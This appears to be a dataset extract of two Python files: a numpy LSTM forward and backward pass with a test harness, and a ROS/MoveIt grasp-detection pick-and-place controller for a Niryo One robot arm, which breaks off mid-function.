text stringlengths 38 1.54M |
|---|
import numpy as np
import rnn_utils
def lstm_cell_forward(xt, a_prev, c_prev, parameters):
    """Run a single forward step of an LSTM cell.

    Arguments:
    xt -- input data at time step "t", shape (n_x, m)
    a_prev -- hidden state at time step "t-1", shape (n_a, m)
    c_prev -- memory (cell) state at time step "t-1", shape (n_a, m)
    parameters -- dict containing:
        Wf, bf -- forget-gate weights (n_a, n_a + n_x) and bias (n_a, 1)
        Wi, bi -- update-gate weights (n_a, n_a + n_x) and bias (n_a, 1)
        Wc, bc -- candidate ("tanh") weights (n_a, n_a + n_x) and bias (n_a, 1)
        Wo, bo -- output-gate weights (n_a, n_a + n_x) and bias (n_a, 1)
        Wy, by -- prediction weights (n_y, n_a) and bias (n_y, 1)

    Returns:
    a_next -- next hidden state, shape (n_a, m)
    c_next -- next memory state, shape (n_a, m)
    yt_pred -- prediction at time step "t", shape (n_y, m)
    cache -- values saved for the backward pass:
             (a_next, c_next, a_prev, c_prev, forget, update, candidate,
              output, xt, parameters)
    """
    Wf, bf = parameters["Wf"], parameters["bf"]
    Wi, bi = parameters["Wi"], parameters["bi"]
    Wc, bc = parameters["Wc"], parameters["bc"]
    Wo, bo = parameters["Wo"], parameters["bo"]
    Wy, by = parameters["Wy"], parameters["by"]

    # Stack previous hidden state on top of the current input: shape (n_a + n_x, m).
    stacked = np.concatenate((a_prev, xt), axis=0)

    # Gate activations: forget, update (input) and output gates.
    forget_gate = rnn_utils.sigmoid(np.dot(Wf, stacked) + bf)
    update_gate = rnn_utils.sigmoid(np.dot(Wi, stacked) + bi)
    output_gate = rnn_utils.sigmoid(np.dot(Wo, stacked) + bo)

    # Candidate memory value and the blended new memory state.
    candidate = np.tanh(np.dot(Wc, stacked) + bc)
    c_next = update_gate * candidate + forget_gate * c_prev

    # New hidden state, then the per-step prediction.
    a_next = output_gate * np.tanh(c_next)
    yt_pred = rnn_utils.softmax(np.dot(Wy, a_next) + by)

    cache = (a_next, c_next, a_prev, c_prev, forget_gate, update_gate,
             candidate, output_gate, xt, parameters)
    return a_next, c_next, yt_pred, cache
def lstm_forward(x, a0, parameters):
    """Forward propagation through a chain of LSTM cells over T_x time steps.

    Arguments:
    x -- inputs for every time step, shape (n_x, m, T_x)
    a0 -- initial hidden state, shape (n_a, m)
    parameters -- dict of LSTM weights/biases (see lstm_cell_forward)

    Returns:
    a -- hidden states for every step, shape (n_a, m, T_x)
    y -- predictions for every step, shape (n_y, m, T_x)
    c -- memory states for every step, shape (n_a, m, T_x)
    caches -- (list of per-step caches, x) saved for the backward pass
    """
    n_x, m, T_x = x.shape
    n_y, n_a = parameters["Wy"].shape

    # Pre-allocate the output tensors.
    a = np.zeros((n_a, m, T_x))
    c = np.zeros((n_a, m, T_x))
    y = np.zeros((n_y, m, T_x))

    step_caches = []
    a_t = a0
    c_t = np.zeros((n_a, m))  # initial memory state is all zeros

    for t in range(T_x):
        a_t, c_t, y_t, cache = lstm_cell_forward(x[:, :, t], a_t, c_t, parameters)
        a[:, :, t] = a_t
        c[:, :, t] = c_t
        y[:, :, t] = y_t
        step_caches.append(cache)

    return a, y, c, (step_caches, x)
def lstm_cell_backward(da_next, dc_next, cache):
    """Single-step backward propagation for an LSTM cell.

    Arguments:
    da_next -- gradient w.r.t. the next hidden state, shape (n_a, m)
    dc_next -- gradient w.r.t. the next memory state, shape (n_a, m)
    cache -- tuple stored by the forward pass:
             (a_next, c_next, a_prev, c_prev, ft, it, cct, ot, xt, parameters)

    Returns:
    gradients -- dict with:
        dxt -- gradient of the input, (n_x, m)
        da_prev -- gradient of the previous hidden state, (n_a, m)
        dc_prev -- gradient of the previous memory state, (n_a, m)
        dWf, dbf, dWi, dbi, dWc, dbc, dWo, dbo -- parameter gradients
    """
    (a_next, c_next, a_prev, c_prev, ft, it, cct, ot, xt, parameters) = cache

    n_x, m = xt.shape
    n_a, m = a_next.shape

    # Shared factor: derivative of tanh(c_next), reused by several gradients.
    tanh_c = np.tanh(c_next)
    dtanh = 1 - np.square(tanh_c)

    # Pre-activation gradients of the output gate, candidate, update and forget gates.
    dot = da_next * tanh_c * ot * (1 - ot)
    dcct = (dc_next * it + ot * dtanh * it * da_next) * (1 - np.square(cct))
    dit = (dc_next * cct + ot * dtanh * cct * da_next) * it * (1 - it)
    dft = (da_next * ot * dtanh + dc_next) * c_prev * ft * (1 - ft)

    # All four gates read the same stacked [a_prev; xt] input.
    stacked_T = np.vstack((a_prev, xt)).T
    dWf = np.dot(dft, stacked_T)
    dWi = np.dot(dit, stacked_T)
    dWc = np.dot(dcct, stacked_T)
    dWo = np.dot(dot, stacked_T)
    dbf = np.sum(dft, axis=1, keepdims=True)
    dbi = np.sum(dit, axis=1, keepdims=True)
    dbc = np.sum(dcct, axis=1, keepdims=True)
    dbo = np.sum(dot, axis=1, keepdims=True)

    # Gradients w.r.t. previous hidden state, previous memory state and input.
    # Columns [:, :n_a] of each weight act on a_prev; columns [:, n_a:] on xt.
    Wf, Wi, Wc, Wo = parameters["Wf"], parameters["Wi"], parameters["Wc"], parameters["Wo"]
    da_prev = np.dot(Wf[:, :n_a].T, dft) + np.dot(Wc[:, :n_a].T, dcct) + np.dot(
        Wi[:, :n_a].T, dit) + np.dot(Wo[:, :n_a].T, dot)
    dc_prev = dc_next * ft + ot * dtanh * ft * da_next
    dxt = np.dot(Wf[:, n_a:].T, dft) + np.dot(Wc[:, n_a:].T, dcct) + np.dot(
        Wi[:, n_a:].T, dit) + np.dot(Wo[:, n_a:].T, dot)

    return {"dxt": dxt, "da_prev": da_prev, "dc_prev": dc_prev,
            "dWf": dWf, "dbf": dbf, "dWi": dWi, "dbi": dbi,
            "dWc": dWc, "dbc": dbc, "dWo": dWo, "dbo": dbo}
def lstm_backward(da, caches):
    """Backward propagation through the whole LSTM over all time steps.

    Arguments:
    da -- gradients w.r.t. the hidden states, shape (n_a, m, T_x)
    caches -- output of lstm_forward: (list of per-step caches, x)

    Returns:
    gradients -- dict with:
        dx -- gradient of the inputs, (n_x, m, T_x)
        da0 -- gradient of the initial hidden state, (n_a, m)
        dWf, dbf, dWi, dbi, dWc, dbc, dWo, dbo -- parameter gradients,
        each summed over all time steps
    """
    caches, x = caches
    (a1, c1, a0, c0, f1, i1, cc1, o1, x1, parameters) = caches[0]

    # Shapes come from the upstream gradient and the first step's input.
    n_a, m, T_x = da.shape
    n_x, m = x1.shape

    # Initialize accumulators.
    dx = np.zeros([n_x, m, T_x])
    da_prevt = np.zeros([n_a, m])
    dc_prevt = np.zeros([n_a, m])
    dWf = np.zeros([n_a, n_a + n_x])
    dWi = np.zeros([n_a, n_a + n_x])
    dWc = np.zeros([n_a, n_a + n_x])
    dWo = np.zeros([n_a, n_a + n_x])
    dbf = np.zeros([n_a, 1])
    dbi = np.zeros([n_a, 1])
    dbc = np.zeros([n_a, 1])
    dbo = np.zeros([n_a, 1])

    for t in reversed(range(T_x)):
        # BUG FIX: the hidden-state gradient flowing back through time
        # (da_prevt) must be added to the per-step gradient da[..., t].
        # The original passed da[..., t] alone and never updated da_prevt,
        # so gradients never propagated across more than one time step.
        gradients = lstm_cell_backward(da[..., t] + da_prevt, dc_prevt, caches[t])
        dx[..., t] = gradients["dxt"]
        dWf = dWf + gradients["dWf"]
        dWi = dWi + gradients["dWi"]
        dWc = dWc + gradients["dWc"]
        dWo = dWo + gradients["dWo"]
        dbf = dbf + gradients["dbf"]
        dbi = dbi + gradients["dbi"]
        dbc = dbc + gradients["dbc"]
        dbo = dbo + gradients["dbo"]
        # Carry both state gradients back to the previous time step.
        da_prevt = gradients["da_prev"]
        dc_prevt = gradients["dc_prev"]

    # After the loop, da_prevt holds the gradient w.r.t. the initial state a0.
    da0 = da_prevt

    gradients = {"dx": dx, "da0": da0, "dWf": dWf, "dbf": dbf, "dWi": dWi, "dbi": dbi,
                 "dWc": dWc, "dbc": dbc, "dWo": dWo, "dbo": dbo}
    return gradients
if __name__ == '__main__':
    # Smoke-test the LSTM forward/backward passes on small random tensors.
    np.random.seed(1)
    x = np.random.randn(3, 10, 7)   # inputs: (n_x=3, m=10, T_x=7)
    a0 = np.random.randn(5, 10)     # initial hidden state: (n_a=5, m=10)
    # Gate weights are (n_a, n_a + n_x) = (5, 8); biases (n_a, 1).
    Wf = np.random.randn(5, 5 + 3)
    bf = np.random.randn(5, 1)
    Wi = np.random.randn(5, 5 + 3)
    bi = np.random.randn(5, 1)
    Wo = np.random.randn(5, 5 + 3)
    bo = np.random.randn(5, 1)
    Wc = np.random.randn(5, 5 + 3)
    bc = np.random.randn(5, 1)
    # Prediction head: (n_y=1, n_a=5) and (n_y, 1).
    Wy = np.random.randn(1,5)
    by = np.random.randn(1, 1)
    parameters = {"Wf": Wf, "Wi": Wi, "Wo": Wo, "Wc": Wc, "Wy": Wy, "bf": bf, "bi": bi, "bo": bo, "bc": bc, "by": by}
    a, y, c, caches = lstm_forward(x, a0, parameters)
    # NOTE(review): da covers only 4 of the 7 forward time steps;
    # lstm_backward reads T_x from da.shape, so only the last 4 caches are
    # used. This mirrors the original exercise setup — confirm if changing.
    da = np.random.randn(5, 10, 4)
    gradients = lstm_backward(da, caches)
    print("gradients[\"dx\"][1][2] =", gradients["dx"][1][2])
    print("gradients[\"dx\"].shape =", gradients["dx"].shape)
    print("gradients[\"da0\"][2][3] =", gradients["da0"][2][3])
    print("gradients[\"da0\"].shape =", gradients["da0"].shape)
    print("gradients[\"dWf\"][3][1] =", gradients["dWf"][3][1])
    print("gradients[\"dWf\"].shape =", gradients["dWf"].shape)
    print("gradients[\"dWi\"][1][2] =", gradients["dWi"][1][2])
    print("gradients[\"dWi\"].shape =", gradients["dWi"].shape)
    print("gradients[\"dWc\"][3][1] =", gradients["dWc"][3][1])
    print("gradients[\"dWc\"].shape =", gradients["dWc"].shape)
    print("gradients[\"dWo\"][1][2] =", gradients["dWo"][1][2])
    print("gradients[\"dWo\"].shape =", gradients["dWo"].shape)
    print("gradients[\"dbf\"][4] =", gradients["dbf"][4])
    print("gradients[\"dbf\"].shape =", gradients["dbf"].shape)
    print("gradients[\"dbi\"][4] =", gradients["dbi"][4])
    print("gradients[\"dbi\"].shape =", gradients["dbi"].shape)
    print("gradients[\"dbc\"][4] =", gradients["dbc"][4])
    print("gradients[\"dbc\"].shape =", gradients["dbc"].shape)
    print("gradients[\"dbo\"][4] =", gradients["dbo"][4])
    print("gradients[\"dbo\"].shape =", gradients["dbo"].shape)
|
#!/usr/bin/env python3
import rospy
import numpy as np
import copy
import tf
import tf2_ros
import yaml
import datetime
import gc
from tools import *
from pprint import pprint
from pyquaternion import Quaternion
from gpd.msg import GraspConfigList
from moveit_python import *
from moveit_msgs.msg import Grasp, PlaceLocation
import geometry_msgs.msg
from geometry_msgs.msg import PoseStamped, Vector3, Pose, TransformStamped, PointStamped
from trajectory_msgs.msg import JointTrajectoryPoint
from visualization_msgs.msg import Marker
from std_msgs.msg import Header, ColorRGBA, String
import sensor_msgs.msg #import PointCloud2
from gpd_controller import GpdGrasps
from robot_controller import RobotPreparation
from moveit_python.geometry import rotate_pose_msg_by_euler_angles
from tf.transformations import *
from filter_pointcloud_client import call_pointcloud_filter_service
from rosnode import get_node_names, kill_nodes
from pointcloud_operations import create_mesh_and_save
from sensor_msgs import point_cloud2
#import geometry_msgs.msg #for pose2 simple
import math
#from tools import *
#from pprint import pprint
#from pyquaternion import Quaternion
#from gpd.msg import GraspConfigList
#from moveit_python import *
#from moveit_msgs.msg import Grasp, PlaceLocation
#from geometry_msgs.msg import PoseStamped, Vector3, Pose
#from trajectory_msgs.msg import JointTrajectoryPoint
#from visualization_msgs.msg import Marker
#from std_msgs.msg import Header, ColorRGBA
#from moveit_python.geometry import rotate_pose_msg_by_euler_angles
import sys
import moveit_commander
#import moveit_msgs.msg
#import geometry_msgs.msg
#from math import pi
#from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from tf.msg import tfMessage
from niryo_one_python_api.niryo_one_api import *
import time
#import yaml
import subprocess
class GpdPickPlace(object):
    """Pick-and-place pipeline driven by GPD (Grasp Pose Detection).

    Subscribes to clustered grasp candidates published by GPD, converts them
    into MoveIt ``Grasp`` messages, and runs pick/place sequences through
    ``moveit_python``'s PickPlaceInterface on a Niryo One arm.
    """

    # Latest grasp candidates received from GPD (filled by grasp_callback).
    grasps = []
    # When True, publish RViz markers for grasp poses.
    mark_pose = False
    #grasp_offset = 0
    # Offset (m) applied along the approach vector to move the grasp point
    # back from the detected object surface.
    grasp_offset = -0.03
    #grasp_offset = -0.05

    def __init__(self, mark_pose=False):
        """Set up the GPD subscriber, optional marker publisher, and the
        MoveIt pick/place + planning-scene interfaces."""
        self.grasp_subscriber = rospy.Subscriber("/detect_grasps/clustered_grasps", GraspConfigList,
                                                 self.grasp_callback)
        if mark_pose:
            self.mark_pose = True
            self.marker_publisher = rospy.Publisher('visualization_marker', Marker, queue_size=5)
            #self.marker_publisher = rospy.Publisher('visualization_marker', Marker)
        self.p = PickPlaceInterface(group="arm", ee_group="tool", verbose=True)
        self.planning = PlanningSceneInterface("camera_color_optical_frame")
        #self.tfBuffer = tf2_ros.Buffer()
        #self.listener = tf2_ros.TransformListener(self.tfBuffer)
        #self.transformer = tf2_ros.BufferInterface()
        self.tf = tf.TransformListener()
        self.br = tf.TransformBroadcaster()
        #self.bcaster = tf2_ros.StaticTransformBroadcaster()
        #self.transformer = tf.TransformerROS(cache_time = rospy.Duration(10.0))
        #time.sleep(3)

    def grasp_callback(self, msg):
        """Store the received grasp list and unsubscribe (one-shot)."""
        self.grasps = msg.grasps
        self.grasp_subscriber.unregister()
        # frame_id = msg.header.frame_id
        pevent("Received new grasps")

    def show_grasp_pose(self, publisher, grasp_pose):
        """Publish an arrow marker in the camera frame for a grasp pose."""
        # pinfo("Marker orientation:")
        # pprint(grasp_pose.orientation)
        marker = Marker(
            type=Marker.ARROW,
            id=0,
            lifetime=rospy.Duration(30),
            pose=grasp_pose,
            scale=Vector3(0.03, 0.02, 0.02),
            header=Header(frame_id='camera_color_optical_frame'),
            color=ColorRGBA(1.0, 1.0, 0.0, 0.8))
        publisher.publish(marker)

    #def show_grasp_pose(self, publisher, grasp_pose):
    #    place_marker_at_pose(publisher, grasp_pose)

    def place_marker_at_pose(self, publisher, poseStamped):
        """Publish a red arrow marker at a stamped pose (uses its own frame)."""
        marker_x = Marker(
            type=Marker.ARROW,
            id=0,
            lifetime=rospy.Duration(60),
            pose=poseStamped.pose,
            scale=Vector3(0.1, 0.01, 0.01),
            header=poseStamped.header,
            color=ColorRGBA(1.0, 0.0, 0.0, 0.8))
        publisher.publish(marker_x)

    def get_gpd_grasps(self):
        """Block until grasp_callback has delivered at least one grasp."""
        pevent("Waiting for grasps to arrive")
        while len(self.grasps) == 0:
            rospy.sleep(0.01)
        return self.grasps

    def generate_grasp_msgs(self, grasps):
        """Convert GPD grasp candidates into MoveIt Grasp messages.

        Applies grasp_offset along the approach vector, converts the GPD
        rotation matrix to a quaternion, transforms the pose to base_link
        and re-expresses it through a broadcast "virtual_tool" frame.
        """
        formatted_grasps = []
        for i in range(0, len(grasps)):
            g = Grasp()
            g.id = "dupa_" + str(i)
            gp = PoseStamped()
            gp.header.frame_id = "camera_color_optical_frame"
            org_q = self.trans_matrix_to_quaternion(grasps[i])
            # rot_q = Quaternion(0.7071, 0.7071, 0, 0)  # 90* around X axis (W, X, Y, Z)
            # quat = rot_q * org_q
            quat = org_q
            # Move grasp back for given offset
            gp.pose.position.x = grasps[i].surface.x + self.grasp_offset * grasps[i].approach.x
            gp.pose.position.y = grasps[i].surface.y + self.grasp_offset * grasps[i].approach.y
            gp.pose.position.z = grasps[i].surface.z + self.grasp_offset * grasps[i].approach.z
            # pyquaternion stores elements as (w, x, y, z), hence the index shuffle.
            gp.pose.orientation.x = float(quat.elements[1])
            gp.pose.orientation.y = float(quat.elements[2])
            gp.pose.orientation.z = float(quat.elements[3])
            gp.pose.orientation.w = float(quat.elements[0])
            #pprint(gp.pose.orientation)
            g.grasp_pose = gp
            # Approach straight along the tool's x axis.
            g.pre_grasp_approach.direction.header.frame_id = "tool_link"
            g.pre_grasp_approach.direction.vector.x = 1.0
            g.pre_grasp_approach.direction.vector.y = 0.0
            g.pre_grasp_approach.direction.vector.z = 0.0
            g.pre_grasp_approach.min_distance = 0.04
            g.pre_grasp_approach.desired_distance = 0.08
            # g.pre_grasp_posture.joint_names = ["joint_6"]
            # g.pre_grasp_posture.header.frame_id = "hand_link"
            # pos = JointTrajectoryPoint()
            # pos.positions.append(0)
            # pos.positions.append(0.1337)
            # g.pre_grasp_posture.points.append(pos)
            # g.grasp_posture.joint_names = ["gripper_right_finger_joint", "gripper_left_finger_joint"]
            # g.grasp_posture.joint_names = ["joint_6"]
            # pos = JointTrajectoryPoint()
            # pos.positions.append(0.0)
            # pos.positions.append(0.0)
            # pos.accelerations.append(0.0)
            # pos.accelerations.append(0.0)
            # g.grasp_posture.points.append(pos)
            # g.grasp_posture.header.frame_id = "hand_link"
            #g.allowed_touch_objects = ["<octomap>", "obj"]
            g.allowed_touch_objects = ["obj"]
            g.max_contact_force = 0.0
            # was grasps[0].score.data — why index 0 and not i? (fixed below)
            g.grasp_quality = grasps[i].score.data
            # Create virtual link so I can get the transform from the gripper_link to grasp pose
            # transform_msg = geometry_msgs.msg.TransformStamped()
            # transform_msg.header.frame_id = "camera_color_optical_frame"
            # transform_msg.child_frame_id = "virtual_frame"
            # transform_msg.transform.translation.x = g.grasp_pose.pose.position.x
            # transform_msg.transform.translation.y = g.grasp_pose.pose.position.y
            # transform_msg.transform.translation.z = g.grasp_pose.pose.position.z
            # transform_msg.transform.rotation.x = g.grasp_pose.pose.orientation.x
            # transform_msg.transform.rotation.y = g.grasp_pose.pose.orientation.y
            # transform_msg.transform.rotation.z = g.grasp_pose.pose.orientation.z
            # transform_msg.transform.rotation.w = g.grasp_pose.pose.orientation.w
            # self.bcaster.sendTransform(transform_msg)
            # time.sleep(1)
            # #t = self.tf.getLatestCommonTime("virtual_frame", "gripper_link")
            # t = rospy.Time(0)
            # self.tf.waitForTransform("gripper_link", "virtual_frame", t, rospy.Duration(4.0))
            # (v_trans, v_rot) = self.tf.lookupTransformFull("gripper_link", t, "virtual_frame", t, "base_link")
            # #t = self.tf.getLatestCommonTime("tool_link", "base_link")
            # self.tf.waitForTransform("base_link", "tool_link", t, rospy.Duration(4.0))
            # (tool_trans, tool_rot) = self.tf.lookupTransformFull("base_link",t, "tool_link", t, "base_link")
            # pprint((v_trans, tool_trans))
            # #Update the grasp message, tool_link and gripper have the same orientation
            # g.grasp_pose.pose.position.x = tool_trans[0] + v_trans[0]
            # g.grasp_pose.pose.position.y = tool_trans[1] + v_trans[1]
            # g.grasp_pose.pose.position.z = tool_trans[2] + v_trans[2]
            # gp.header.frame_id = "base_link"
            #t = rospy.Time(0)
            #grasp_point = geometry_msgs.msg.PointStamped()
            #grasp_point.header.frame_id = "camera_color_optical_frame"
            #grasp_point.point = g.grasp_pose.pose.position
            #Get grasp point in base_link coordinate system
            #t = self.tf.getLatestCommonTime("camera_color_optical_frame", "base_link")
            #print(t)
            #self.tf.waitForTransform("camera_color_optical_frame", "base_link", t, rospy.Duration(4.0))
            #grasp_base = self.transformer.TransformPose("base_link", grasp_point)
            #grasp_base = self.transformer.transform(grasp_point, "base_link", timeout=rospy.Duration(4.0))
            # Express the grasp pose in the robot base frame.
            grasp_base = self.tf.transformPose("base_link", g.grasp_pose)
            # #Get tool and gripper translations from base_link
            # #self.tf.waitForTransform("base_link", "tool_link", rospy.Duration(4.0))
            # tool_trans, _ = self.tf.lookupTransform("base_link", "tool_link", rospy.Time(0))
            # gripper_trans, _ = self.tf.lookupTransform("base_link", "gripper_link", rospy.Time(0))
            # g.grasp_pose.header.frame_id = "base_link"
            # g.grasp_pose.pose.position.x = tool_trans[0] + grasp_base.pose.position.x - gripper_trans[0]
            # g.grasp_pose.pose.position.y = tool_trans[1] + grasp_base.pose.position.y - gripper_trans[1]
            # g.grasp_pose.pose.position.z = tool_trans[2] + grasp_base.pose.position.z - gripper_trans[2]
            # g.grasp_pose.pose.orientation.x = grasp_base.pose.orientation.x
            # g.grasp_pose.pose.orientation.y = grasp_base.pose.orientation.y
            # g.grasp_pose.pose.orientation.z = grasp_base.pose.orientation.z
            # g.grasp_pose.pose.orientation.w = grasp_base.pose.orientation.w
            #pprint(g.grasp_pose)
            # q = Quaternion(g.grasp_pose.pose.orientation.w,
            #                g.grasp_pose.pose.orientation.x,
            #                g.grasp_pose.pose.orientation.y,
            #                g.grasp_pose.pose.orientation.z)
            # (x_axis, z_axis) = (q.rotate([1.0, 0.0, 0.0]),
            #                     q.rotate([0.0, 0.0, 1.0]))
            # g.grasp_pose.header.frame_id = "base_link"
            # g.grasp_pose.pose.position.x = grasp_base.pose.position.x - 0.025 * x_axis[0] + 0.015 * z_axis[0]
            # g.grasp_pose.pose.position.y = grasp_base.pose.position.y - 0.025 * x_axis[1] + 0.015 * z_axis[1]
            # g.grasp_pose.pose.position.z = grasp_base.pose.position.z - 0.025 * x_axis[2] + 0.015 * z_axis[2]
            # g.grasp_pose.pose.orientation.x = grasp_base.pose.orientation.x
            # g.grasp_pose.pose.orientation.y = grasp_base.pose.orientation.y
            # g.grasp_pose.pose.orientation.z = grasp_base.pose.orientation.z
            # g.grasp_pose.pose.orientation.w = grasp_base.pose.orientation.w
            # Broadcast the grasp as a tf frame, hang a fixed-offset
            # "virtual_tool" frame off it, then read that frame back in
            # base_link to get the final end-effector pose.
            t = rospy.Time.now()
            self.br.sendTransform((grasp_base.pose.position.x, grasp_base.pose.position.y, grasp_base.pose.position.z),
                                  (grasp_base.pose.orientation.x, grasp_base.pose.orientation.y, grasp_base.pose.orientation.z, grasp_base.pose.orientation.w),
                                  t, "grasp_frame", "base_link")
            self.br.sendTransform((-0.025, 0.0, 0.015), (0, 0, 0, 1), t, "virtual_tool", "grasp_frame")
            tool_pose = geometry_msgs.msg.PoseStamped()
            tool_pose.header.frame_id = "virtual_tool"
            tool_pose.pose.orientation.w = 1.0
            self.tf.waitForTransform("base_link", "virtual_tool", t, rospy.Duration(4.0))
            g.grasp_pose.header.frame_id = "base_link"
            g.grasp_pose = self.tf.transformPose("base_link", tool_pose)
            formatted_grasps.append(g)
        return formatted_grasps

    def trans_matrix_to_quaternion(self, grasp):
        """Build a quaternion from the GPD approach/binormal/axis column vectors."""
        r = np.array([[grasp.approach.x, grasp.binormal.x, grasp.axis.x],
                      [grasp.approach.y, grasp.binormal.y, grasp.axis.y],
                      [grasp.approach.z, grasp.binormal.z, grasp.axis.z]])
        return Quaternion(matrix=r)

    def pick(self, grasps_list, verbose=False):
        """Try grasps in order until one succeeds; abort after 5 failures.

        Returns the successful Grasp message (used later for placing).
        """
        failed_grasps = 0
        pevent("Pick sequence started")
        # Add object mesh to planning scene
        self.add_object_mesh()
        #t = self.tf.getLatestCommonTime("base_link", "camera_depth_optical_frame")
        for single_grasp in grasps_list:
            if self.mark_pose:
                self.show_grasp_pose(self.marker_publisher, single_grasp.grasp_pose.pose)
                rospy.sleep(1)
            #single_grasp.grasp_pose = self.tf.transformPose("base_link", single_grasp.grasp_pose)
            if verbose:
                pevent("Executing grasp: ")
                pprint(single_grasp.grasp_pose)
                self.place_marker_at_pose(self.marker_publisher, single_grasp.grasp_pose)
            pick_result = self.p.pickup("obj", [single_grasp, ], planning_time=9001, support_name="<octomap>",
                                        allow_gripper_support_collision=True)
            pevent("Planner returned: " + get_moveit_error_code(pick_result.error_code.val))
            # MoveIt error code 1 == SUCCESS.
            if pick_result.error_code.val == 1:
                pevent("Grasp successful!")
                return single_grasp
            else:
                failed_grasps += 1
                if failed_grasps == 5:
                    pevent("All grasps failed. Aborting")
                    exit(1)

    def place2(self, place_msg, niryo):
        """Place by direct Cartesian goals: lift, move to the mirrored-y
        position, lower, open the gripper, and lift again."""
        pevent("Place sequence started")
        group_name = "arm"
        group = moveit_commander.MoveGroupCommander(group_name)
        # Lift straight up from the grasp pose.
        p2 = copy.deepcopy(place_msg.grasp_pose.pose)
        p2.position.z = 0.3
        group.set_pose_target(p2)
        plan = group.go(wait=True)
        group.stop()
        group.clear_pose_targets()
        # Move above the place position (grasp position mirrored in y).
        p3 = copy.deepcopy(place_msg.grasp_pose.pose)
        p3.position.y = -place_msg.grasp_pose.pose.position.y
        p3.position.z = 0.3
        group.set_pose_target(p3)
        plan = group.go(wait=True)
        group.stop()
        group.clear_pose_targets()
        # Lower back to the grasp height at the mirrored position.
        p4 = copy.deepcopy(place_msg.grasp_pose.pose)
        p4.position.y = -place_msg.grasp_pose.pose.position.y
        group.set_pose_target(p4)
        # The go command can be called with joint values, poses, or without any
        # parameters if you have already set the pose or joint target for the group
        # group.go(joint_goal, wait=True)
        plan = group.go(wait=True)
        # Calling `stop()` ensures that there is no residual movement
        group.stop()
        group.clear_pose_targets()
        niryo.open_gripper(TOOL_GRIPPER_3_ID, 200)
        print("Gripper 2 opened")
        # Retreat upwards after releasing the object.
        p5 = copy.deepcopy(place_msg.grasp_pose.pose)
        p5.position.y = -place_msg.grasp_pose.pose.position.y
        p5.position.z = 0.3
        group.set_pose_target(p5)
        plan = group.go(wait=True)
        group.stop()
        group.clear_pose_targets()
        # p6 = Pose()
        # p6.position.x = 0.065
        # p6.position.y = 0.0
        # p6.position.z = 0.207
        # p6.orientation.x = 0.0
        # p6.orientation.y = 0.007
        # p6.orientation.z = 0.0
        # p6.orientation.w = 1.0
        # group.set_pose_target(p6)
        # plan = group.go(wait=True)
        # group.stop()
        # group.clear_pose_targets()

    def return_to_rest(self, place_msg):
        """Lift away from the place pose and move to a fixed rest pose."""
        pevent("Returning to resting position")
        group_name = "arm"
        group = moveit_commander.MoveGroupCommander(group_name)
        p1 = copy.deepcopy(place_msg.grasp_pose.pose)
        p1.position.y = -place_msg.grasp_pose.pose.position.y
        p1.position.z = 0.3
        group.set_pose_target(p1)
        plan = group.go(wait=True)
        group.stop()
        group.clear_pose_targets()
        # Hard-coded rest pose in the planning frame.
        p2 = Pose()
        p2.position.x = 0.065
        p2.position.y = 0.0
        p2.position.z = 0.207
        p2.orientation.x = 0.0
        p2.orientation.y = 0.007
        p2.orientation.z = 0.0
        p2.orientation.w = 1.0
        group.set_pose_target(p2)
        plan = group.go(wait=True)
        group.stop()
        group.clear_pose_targets()

    def place(self, place_msg):
        """Place via PickPlaceInterface at the grasp pose mirrored in y."""
        pevent("Place sequence started")
        #places = self.generate_place_poses(place_pose)
        #place_pose is a Grasp msg
        l = PlaceLocation()
        l.id = "place target"
        l.place_pose = place_msg.grasp_pose
        l.place_pose.pose.position.y = -l.place_pose.pose.position.y
        _, place_result = self.p.place_with_retry("obj", [l, ], support_name="<octomap>", planning_time=9001,
                                                  goal_is_eef=True)
        pevent("Planner returned: " + get_moveit_error_code(place_result.error_code.val))
        # Keep getting INVALID_GROUP_NAME - why???
        # Does pick kill the planning group?

    def generate_place_poses(self, initial_place_pose):
        """Generate 16 place-pose candidates by rotating the successful grasp
        pose around z in equal increments (gives the planner options)."""
        places = list()
        l = PlaceLocation()
        l.id = "dupadupa"
        l.place_pose.header.frame_id = "camera_color_optical_frame"
        q = Quaternion(initial_place_pose.grasp_pose.pose.orientation.w,
                       initial_place_pose.grasp_pose.pose.orientation.x,
                       initial_place_pose.grasp_pose.pose.orientation.y,
                       initial_place_pose.grasp_pose.pose.orientation.z)
        # Load successful grasp pose
        l.place_pose.pose.position = initial_place_pose.grasp_pose.pose.position
        l.place_pose.pose.orientation.w = q.elements[0]
        l.place_pose.pose.orientation.x = q.elements[1]
        l.place_pose.pose.orientation.y = q.elements[2]
        l.place_pose.pose.orientation.z = q.elements[3]
        # Move 20cm to the right
        l.place_pose.pose.position.y += 0.2
        # Fill rest of the msg with some data
        l.post_place_posture = initial_place_pose.grasp_posture
        l.post_place_retreat = initial_place_pose.post_grasp_retreat
        l.pre_place_approach = initial_place_pose.pre_grasp_approach
        places.append(copy.deepcopy(l))
        # Rotate place pose to generate more possible configurations for the planner
        m = 16  # Number of possible place poses
        for i in range(0, m - 1):
            l.place_pose.pose = rotate_pose_msg_by_euler_angles(l.place_pose.pose, 0, 0, 2 * math.pi / m)
            places.append(copy.deepcopy(l))
        return places

    def add_object_mesh(self):
        """Insert the reconstructed object mesh and a table box into the
        planning scene so MoveIt can plan around them."""
        obj_pose = Pose()
        obj_pose.position.x = 0
        obj_pose.position.y = 0
        obj_pose.position.z = 0
        obj_pose.orientation.x = 0
        obj_pose.orientation.y = 0
        obj_pose.orientation.z = 0
        obj_pose.orientation.w = 1
        # Mesh file is produced earlier by obj_pointcloud_callback.
        self.planning.addMesh("obj", obj_pose, "object.stl", use_service = True)
        # p = Pose()
        # p.position.x = 0
        # p.position.y = 0
        # p.position.z = 0
        # p.orientation.x = 0
        # p.orientation.y = 0
        # p.orientation.z = 0
        # p.orientation.w = 1
        # planning.add_box("table", p, (1, 1, 1))
        #t = rospy.Time.now()
        #self.tf.waitForTransform("ground_link", "camera_color_optical_frame", t, rospy.Duration(4.0))
        #(trans, quat) = self.tf.lookupTransform("camera_color_optical_frame", "ground_link", t)
        # 1m cube attached 0.5m below ground_link acts as the table surface.
        self.planning.attachBox("table", 1, 1, 1, 0, 0, -0.5, link_name="ground_link")
        #time.sleep(15)
        #planning.clear()
        # rospy.sleep(3.14)
        # pprint(planning.getKnownCollisionObjects())

    def get_know_successful_grasp(self):
        """Return a hard-coded grasp pose known to have worked (for debugging)."""
        g = Grasp()
        g.id = "successful_predefined_grasp"
        gp = PoseStamped()
        gp.header.frame_id = "camera_color_optical_frame"
        gp.pose.position.x = 0.183518647951
        gp.pose.position.y = -0.23707952283
        gp.pose.position.z = 0.493978534979
